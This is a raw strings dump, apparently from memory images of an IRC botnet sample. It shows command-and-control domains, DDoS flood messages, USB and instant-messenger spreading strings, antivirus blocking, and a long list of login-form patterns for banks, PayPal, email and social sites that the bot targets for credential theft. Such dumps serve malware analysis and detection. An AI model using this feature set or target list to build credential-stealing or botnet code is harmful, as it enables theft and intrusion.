[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
http://
http://
[Login]: %s
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
icon=shell32.dll,7
icon=shell32.dll,7
shellexecute=
shellexecute=
%windir%\system32\cmd.exe
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Í%%%s
&&%%windir%%\explorer.exe %Í%%%s
/c "start %Í%%RECYCLER\%s
/c "start %Í%%RECYCLER\%s
\\.\%c:
\\.\%c:
%s\%s
%s\%s
%sautorun.tmp
%sautorun.tmp
%sautorun.inf
%sautorun.inf
%0x.exe
%0x.exe
*bebo.*/c/profile/comment_post.json
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
msg_text
*facebook.*/ajax/chat/send.php*
*facebook.*/ajax/chat/send.php*
-_.!~*'()
-_.!~*'()
%s.%s hijacked!
%s.%s hijacked!
MSG %d %s %d
MSG %d %s %d
MSG %d %1s
MSG %d %1s
SDG %d %d
SDG %d %d
Content-Length: %d
Content-Length: %d
SDG %d
SDG %d
%s_0xX
%s_0xX
RegCreateKeyExW
RegCreateKeyExW
RegCreateKeyExA
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileW
URLDownloadToFileA
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestA
HttpSendRequestA
NtEnumerateValueKey
NtEnumerateValueKey
DNSAPI.dll
DNSAPI.dll
Secur32.dll
Secur32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
GetProcessHeap
GetProcessHeap
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
mom002.net
mom002.net
mom003.net
mom003.net
mom004.net
mom004.net
]1.1.0.0
]1.1.0.0
msn.set
msn.set
msn.int
msn.int
http.set
http.set
http.int
http.int
http.inj
http.inj
logins
logins
PASS %s
PASS %s
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
USER %s 0 0 :%s
NICK %s
NICK %s
JOIN %s %s
JOIN %s %s
PART %s
PART %s
PRIVMSG %s :%s
PRIVMSG %s :%s
QUIT :%s
QUIT :%s
PONG %s
PONG %s
[v="%s" c="%s" h="%s" p="%S"]
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[Visit]: Error visitng "%s"
[FTP Login]: %s
[FTP Login]: %s
[POP3 Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Login]: %s
[HTTP Traffic]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[DNS]: Blocked DNS "%s"
[MSN]: %s
[MSN]: %s
[HTTP]: %s
[HTTP]: %s
ftplog
ftplog
ftpinfect
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
http://api.wipmania.com/
http://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
\\.\pipe\e621ca05
\\.\pipe\e621ca05
%System%\svchost.exe
%System%\svchost.exe
%WinDir%
%WinDir%
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
7 767<7~7
7 767<7~7
8*808;8~8
8*808;8~8
\\.\pipe
\\.\pipe
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
autorun.inf
autorun.inf
pidgin.exe
pidgin.exe
wlcomm.exe
wlcomm.exe
msnmsgr.exe
msnmsgr.exe
msmsgs.exe
msmsgs.exe
flock.exe
flock.exe
opera.exe
opera.exe
chrome.exe
chrome.exe
ieuser.exe
ieuser.exe
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
.ipconfig.exe
.ipconfig.exe
verclsid.exe
verclsid.exe
regedit.exe
regedit.exe
rundll32.exe
rundll32.exe
cmd.exe
cmd.exe
regsvr32.exe
regsvr32.exe
l"%s" %S
l"%s" %S
lol.exe
lol.exe
n127.0.0.1
n127.0.0.1
%s:Zone.Identifier
%s:Zone.Identifier
wininet.dll
wininet.dll
secur32.dll
secur32.dll
ws2_32.dll
ws2_32.dll
:%S%S\Desktop.ini
:%S%S\Desktop.ini
winlogon.exe
winlogon.exe
explorer.exe
explorer.exe
Aadvapi32.dll
Aadvapi32.dll
urlmon.dll
urlmon.dll
nspr4.dll
nspr4.dll
Akernel23.dll
Akernel23.dll
y%s\%s.exe
y%s\%s.exe
lsass.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe
\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe
c:\%original file name%.exe
c:\%original file name%.exe
svchost.exe_1244_rwx_00C80000_0004E000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
=MSG t
=MSG t
>MSG u`
>MSG u`
=PASS
=PASS
8httpu1
8httpu1
8httpuM
8httpuM
tlSSSSSSSSSShL0
tlSSSSSSSSSShL0
%s.%s
%s.%s
%s.%S
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
%s.p21-> Message hijacked!
msnmsg
msnmsg
CAL %d %6s
CAL %d %6s
ngr->blocksize: %d
ngr->blocksize: %d
block_size: %d
block_size: %d
\\.\pipe\%s
\\.\pipe\%s
kernel32.dll
kernel32.dll
%s_%d
%s_%d
%s-Mutex
%s-Mutex
ntdll.dll
ntdll.dll
%s-pid
%s-pid
%s-comm
%s-comm
JOIN #
JOIN #
PRIVMSG #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
PRIVMSG %5s
JOIN %5s
JOIN %5s
PRIVMSG
PRIVMSG
JOIN
JOIN
%s:%d
%s:%d
%s.%s%s
%s.%s%s
%S%s%s
%S%s%s
%s.%S%S
%s.%S%S
%S%S%S
%S%S%S
state_%s
state_%s
%s.%s (p='%S')
%s.%s (p='%S')
pop3://%s:%s@%s:%d
pop3://%s:%s@%s:%d
%s:%s@%s:%d
%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftpgrab
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s.%s ->> %s : %s
%s-%s-%s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
webroot.
virusbuster.nprotect.
virusbuster.nprotect.
heck.tc
heck.tc
onecare.live.
onecare.live.
login[password]
login[password]
login[username]
login[username]
*members*.iknowthatgirl*/members*
*members*.iknowthatgirl*/members*
*youporn.*/login*
*youporn.*/login*
*members.brazzers.com*
*members.brazzers.com*
*bcointernacional*login*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*:2222/CMD_LOGIN*
*whcms*dologin*
*whcms*dologin*
*:2086/login*
*:2086/login*
*:2083/login*
*:2083/login*
*:2082/login*
*:2082/login*
*webnames.ru/*user_login*
*webnames.ru/*user_login*
Webnames
Webnames
*dotster.com/*login*
*dotster.com/*login*
loginid
loginid
*enom.com/login*
*enom.com/login*
login.Pass
login.Pass
login.User
login.User
*login.Pass=*
*login.Pass=*
*1and1.com/xml/config*
*1and1.com/xml/config*
*moniker.com/*Login*
*moniker.com/*Login*
LoginPassword
LoginPassword
LoginUserName
LoginUserName
*LoginPassword=*
*LoginPassword=*
*namecheap.com/*login*
*namecheap.com/*login*
loginname
loginname
*godaddy.com/login*
*godaddy.com/login*
Password
Password
*Password=*
*Password=*
*alertpay.com/login*
*alertpay.com/login*
*netflix.com/*ogin*
*netflix.com/*ogin*
*thepiratebay.org/login*
*thepiratebay.org/login*
*torrentleech.org/*login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*letitbit.net*
*what.cd/login*
*what.cd/login*
*oron.com/login*
*oron.com/login*
*filesonic.com/*login*
*filesonic.com/*login*
*speedyshare.com/login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploaded.to/*login*
*uploading.com/*login*
*uploading.com/*login*
loginUserPassword
loginUserPassword
loginUserName
loginUserName
*loginUserPassword=*
*loginUserPassword=*
*fileserv.com/login*
*fileserv.com/login*
*hotfile.com/login*
*hotfile.com/login*
*4shared.com/login*
*4shared.com/login*
txtpass
txtpass
*txtpass=*
*txtpass=*
*netload.in/index*
*netload.in/index*
*freakshare.com/login*
*freakshare.com/login*
login_pass
login_pass
*login_pass=*
*login_pass=*
*mediafire.com/*login*
*mediafire.com/*login*
*sendspace.com/login*
*sendspace.com/login*
*megaupload.*/*login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
*secure.logmein.*/*logincheck*
session[password]
session[password]
*password]=*
*password]=*
*twitter.com/sessions
*twitter.com/sessions
txtPassword
txtPassword
*&txtPassword=*
*&txtPassword=*
*.moneybookers.*/*login.pl
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*runescape*/*weblogin*
*&password=*
*&password=*
*no-ip*/login*
*no-ip*/login*
*steampowered*/login*
*steampowered*/login*
quick_password
quick_password
*hackforums.*/member.php
*hackforums.*/member.php
*facebook.*/login.php*
*facebook.*/login.php*
*login.yahoo.*/*login*
*login.yahoo.*/*login*
passwd
passwd
login
login
*passwd=*
*passwd=*
*login.live.*/*post.srf*
*login.live.*/*post.srf*
TextfieldPassword
TextfieldPassword
*TextfieldPassword=*
*TextfieldPassword=*
*gmx.*/*FormLogin*
*gmx.*/*FormLogin*
*Passwd=*
*Passwd=*
FLN-Password
FLN-Password
*FLN-Password=*
*FLN-Password=*
*pass=*
*pass=*
*bigstring.*/*index.php*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
*screenname.aol.*/login.psp*
password
password
loginId
loginId
*password=*
*password=*
*aol.*/*login.psp*
*aol.*/*login.psp*
Passwd
Passwd
*google.*/*ServiceLoginAuth*
*google.*/*ServiceLoginAuth*
login_password
login_password
login_email
login_email
*login_password=*
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
%s / ?%d HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
Mozilla/4.0
Mozilla/4.0
\\.\PHYSICALDRIVE0
\\.\PHYSICALDRIVE0
shell32.dll
shell32.dll
httpi
httpi
dnsapi.dll
dnsapi.dll
http://%s/%s
http://%s/%s
http://%s/
http://%s/
POST /23s
POST /23s
{%s|%s%s}%s
{%s|%s%s}%s
n%s{%s|%s%s}%s
n%s{%s|%s%s}%s
%s|%s|%s
%s|%s|%s
[DNS]: Redirecting "%s" to "%s"
[DNS]: Redirecting "%s" to "%s"
%s|%s
%s|%s
[Logins]: Cleared %d logins
[Logins]: Cleared %d logins
FTP ->
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
http://
http://
[Login]: %s
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
icon=shell32.dll,7
icon=shell32.dll,7
shellexecute=
shellexecute=
%windir%\system32\cmd.exe
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Í%%%s
&&%%windir%%\explorer.exe %Í%%%s
/c "start %Í%%RECYCLER\%s
/c "start %Í%%RECYCLER\%s
\\.\%c:
\\.\%c:
%s\%s
%s\%s
%sautorun.tmp
%sautorun.tmp
%sautorun.inf
%sautorun.inf
%0x.exe
%0x.exe
*bebo.*/c/profile/comment_post.json
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
msg_text
*facebook.*/ajax/chat/send.php*
*facebook.*/ajax/chat/send.php*
-_.!~*'()
-_.!~*'()
%s.%s hijacked!
%s.%s hijacked!
MSG %d %s %d
MSG %d %s %d
MSG %d %1s
MSG %d %1s
SDG %d %d
SDG %d %d
Content-Length: %d
Content-Length: %d
SDG %d
SDG %d
%s_0xX
%s_0xX
RegCreateKeyExW
RegCreateKeyExW
RegCreateKeyExA
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileW
URLDownloadToFileA
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestA
HttpSendRequestA
NtEnumerateValueKey
NtEnumerateValueKey
DNSAPI.dll
DNSAPI.dll
Secur32.dll
Secur32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
GetProcessHeap
GetProcessHeap
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
mom002.net
mom002.net
mom003.net
mom003.net
mom004.net
mom004.net
]1.1.0.0
]1.1.0.0
msn.set
msn.set
msn.int
msn.int
http.set
http.set
http.int
http.int
http.inj
http.inj
logins
logins
PASS %s
PASS %s
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
USER %s 0 0 :%s
NICK %s
NICK %s
JOIN %s %s
JOIN %s %s
PART %s
PART %s
PRIVMSG %s :%s
PRIVMSG %s :%s
QUIT :%s
QUIT :%s
PONG %s
PONG %s
[v="%s" c="%s" h="%s" p="%S"]
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[Visit]: Error visitng "%s"
[FTP Login]: %s
[FTP Login]: %s
[POP3 Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Login]: %s
[HTTP Traffic]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[DNS]: Blocked DNS "%s"
[MSN]: %s
[MSN]: %s
[HTTP]: %s
[HTTP]: %s
ftplog
ftplog
ftpinfect
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
http://api.wipmania.com/
http://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
\\.\pipe\e621ca05
\\.\pipe\e621ca05
%System%\svchost.exe
%System%\svchost.exe
%WinDir%
%WinDir%
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
7 767<7~7
7 767<7~7
8*808;8~8
8*808;8~8
\\.\pipe
\\.\pipe
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
autorun.inf
autorun.inf
pidgin.exe
pidgin.exe
wlcomm.exe
wlcomm.exe
msnmsgr.exe
msnmsgr.exe
msmsgs.exe
msmsgs.exe
flock.exe
flock.exe
opera.exe
opera.exe
chrome.exe
chrome.exe
ieuser.exe
ieuser.exe
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
.ipconfig.exe
.ipconfig.exe
verclsid.exe
verclsid.exe
regedit.exe
regedit.exe
rundll32.exe
rundll32.exe
cmd.exe
cmd.exe
regsvr32.exe
regsvr32.exe
l"%s" %S
l"%s" %S
lol.exe
lol.exe
n127.0.0.1
n127.0.0.1
%s:Zone.Identifier
%s:Zone.Identifier
wininet.dll
wininet.dll
secur32.dll
secur32.dll
ws2_32.dll
ws2_32.dll
:%S%S\Desktop.ini
:%S%S\Desktop.ini
winlogon.exe
winlogon.exe
explorer.exe
explorer.exe
Aadvapi32.dll
Aadvapi32.dll
urlmon.dll
urlmon.dll
nspr4.dll
nspr4.dll
Akernel23.dll
Akernel23.dll
y%s\%s.exe
y%s\%s.exe
lsass.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe
\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe
c:\%original file name%.exe
c:\%original file name%.exe
wmiprvse.exe_1352_rwx_00DE0000_0004E000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
=MSG t
=MSG t
>MSG u`
>MSG u`
=PASS
=PASS
8httpu1
8httpu1
8httpuM
8httpuM
tlSSSSSSSSSShL0
tlSSSSSSSSSShL0
%s.%s
%s.%s
%s.%S
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
%s.p21-> Message hijacked!
msnmsg
msnmsg
CAL %d %6s
CAL %d %6s
ngr->blocksize: %d
ngr->blocksize: %d
block_size: %d
block_size: %d
\\.\pipe\%s
\\.\pipe\%s
kernel32.dll
kernel32.dll
%s_%d
%s_%d
%s-Mutex
%s-Mutex
ntdll.dll
ntdll.dll
%s-pid
%s-pid
%s-comm
%s-comm
JOIN #
JOIN #
PRIVMSG #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
PRIVMSG %5s
JOIN %5s
JOIN %5s
PRIVMSG
PRIVMSG
JOIN
JOIN
%s:%d
%s:%d
%s.%s%s
%s.%s%s
%S%s%s
%S%s%s
%s.%S%S
%s.%S%S
%S%S%S
%S%S%S
state_%s
state_%s
%s.%s (p='%S')
%s.%s (p='%S')
pop3://%s:%s@%s:%d
pop3://%s:%s@%s:%d
%s:%s@%s:%d
%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftpgrab
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s.%s ->> %s : %s
%s-%s-%s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
webroot.
virusbuster.nprotect.
virusbuster.nprotect.
heck.tc
heck.tc
onecare.live.
onecare.live.
login[password]
login[password]
login[username]
login[username]
*members*.iknowthatgirl*/members*
*members*.iknowthatgirl*/members*
*youporn.*/login*
*youporn.*/login*
*members.brazzers.com*
*members.brazzers.com*
*bcointernacional*login*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*:2222/CMD_LOGIN*
*whcms*dologin*
*whcms*dologin*
*:2086/login*
*:2086/login*
*:2083/login*
*:2083/login*
*:2082/login*
*:2082/login*
*webnames.ru/*user_login*
*webnames.ru/*user_login*
Webnames
Webnames
*dotster.com/*login*
*dotster.com/*login*
loginid
loginid
*enom.com/login*
*enom.com/login*
login.Pass
login.Pass
login.User
login.User
*login.Pass=*
*login.Pass=*
*1and1.com/xml/config*
*1and1.com/xml/config*
*moniker.com/*Login*
*moniker.com/*Login*
LoginPassword
LoginPassword
LoginUserName
LoginUserName
*LoginPassword=*
*LoginPassword=*
*namecheap.com/*login*
*namecheap.com/*login*
loginname
loginname
*godaddy.com/login*
*godaddy.com/login*
Password
Password
*Password=*
*Password=*
*alertpay.com/login*
*alertpay.com/login*
*netflix.com/*ogin*
*netflix.com/*ogin*
*thepiratebay.org/login*
*thepiratebay.org/login*
*torrentleech.org/*login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*sms4file.com/*/signin-do*
